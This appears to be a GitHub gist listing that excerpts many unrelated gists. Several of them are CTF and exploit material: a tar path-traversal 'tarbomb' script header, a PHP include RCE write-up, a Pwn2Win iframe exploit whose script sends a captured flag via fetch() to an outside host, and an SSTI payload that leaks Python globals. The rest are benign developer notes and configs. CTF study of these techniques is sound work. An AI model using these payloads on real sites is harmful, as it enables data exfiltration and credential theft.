Skip to content

Instantly share code, notes, and snippets.

View LorseKudos's full-sized avatar

Lorse LorseKudos

7 followers · 9 following
View GitHub Profile
@munetoshi
munetoshi / code-readability-links.md
Last active April 7, 2025 06:13
Links of Code readability presentation
@pich4ya
pich4ya / tarbomb.py
Created May 18, 2022 04:43
Taken from https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution
#!/bin/python
# python tarbomb.py `pwd`/__init__.py pwn.tar.gz 10 app/
# Copyright 2020 Andrew Scott
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE
@loknop
loknop / writeup.md
Created December 30, 2021 14:59
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@00xc
00xc / binwalk-extract.py
Last active April 15, 2025 07:30
Extracting every embedded file with binwalk
#!/usr/bin/env python3
import sys
import os
import binwalk
import shlex
import subprocess as sp
def dump_file(file, offset, size, outfile):
cmd = "dd if={} of={} bs=1 skip={}".format(file, outfile, offset, size)
if size is not None:
@jorgectf
jorgectf / DragonSector_2020_Scratchpad.md
Last active November 22, 2021 18:24
Solution for DragonSector 2020 CTF's ScratchPad challenge.
@icchy
icchy / q.html
Last active April 26, 2023 22:01
Pwn2Win 2020 matrona v2
<iframe id="ifr0" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<iframe id="ifr1" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<script>
window.addEventListener('hashchange', (evt) => {
const flag = evt.newURL.match(/CTF-BR\{.*\}/)[0]
fetch(`//tool.tonkatsu.info/?flag=${encodeURIComponent(flag)}`)
})
</script>
@stypr
stypr / dogooos.md
Last active June 15, 2020 11:35
DEFCON Quals Web exploit (Participated as r3kapig)

SSTI

  1. Write one comment
  2. When writing a comment content, do SSTI to leak author's credentials
{rating[comments][0].__class__.__init__.__globals__}
{'__name__': 'app.loaddata', '__doc__': None, '__package__': 'app', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, '__spec__': ModuleSpec(name='app.loaddata', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, origin='./app/loaddata.py'), '__file__': './app/loaddata.py', '__cached__': './app/__pycache__/loaddata.cpython-38.pyc', '__builtins__': {'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': , '__spec__': ModuleSpec(name='builtins', loader=), '__build_class__': , '__import__': , 'abs': , 'all': , 'any': , 'ascii': , 'bin': , 'breakpoint': , 'callable': , 'chr': , 'compile': , 'delattr': , 'dir': , 'divmod': , 'eval': , 'exec': , 'format':
@shun-shobon
shun-shobon / .eslintrc
Last active November 22, 2020 14:43
TypeScript + ESLint + Prettier環境構築例
{
"env": {
"node": true,
"es2021": true
},
"plugins": ["@typescript-eslint"],
"parser": "@typescript-eslint/parser",
"parserOptions": {
"sourceType": "module"
},
@mpppk
mpppk / clean_architecture.md
Last active April 22, 2025 09:58
クリーンアーキテクチャ完全に理解した

2020/5/31追記: 自分用のメモに書いていたつもりだったのですが、たくさんのスターを頂けてとても嬉しいです。
と同時に、書きかけで中途半端な状態のドキュメントをご覧いただくことになっており、大変心苦しく思っています。

このドキュメントを完成させるために、今後以下のような更新を予定しています。

  • TODO部分を埋める
  • 書籍を基にした理論・原則パートと、実装例パートを分割
    • 現在は4層のレイヤそれぞれごとに原則の確認→実装時の課題リスト→実装例という構成ですが、同じリポジトリへの言及箇所がバラバラになってしまう問題がありました。更新後は、実装時の課題リストを全て洗い出した後にまとめて実装を確認する構成とする予定です。

2021/1/22追記:

@catatsuy
catatsuy / mercari_go_isucon.md
Last active March 14, 2025 13:00

GoでISUCONを戦う話

mercari.go #4 https://mercari.connpass.com/event/105640/

自己紹介

  • catatsuyというIDで各種SNS活動しています
    • かたついって呼ばれています
  • メルカリのSREチームで主にGoを書いています
  • 前職はピクシブでpixivのHTTPS化・PHP7.1化・HTTP/2化や、広告サーバーの新機能追加など色々やっていました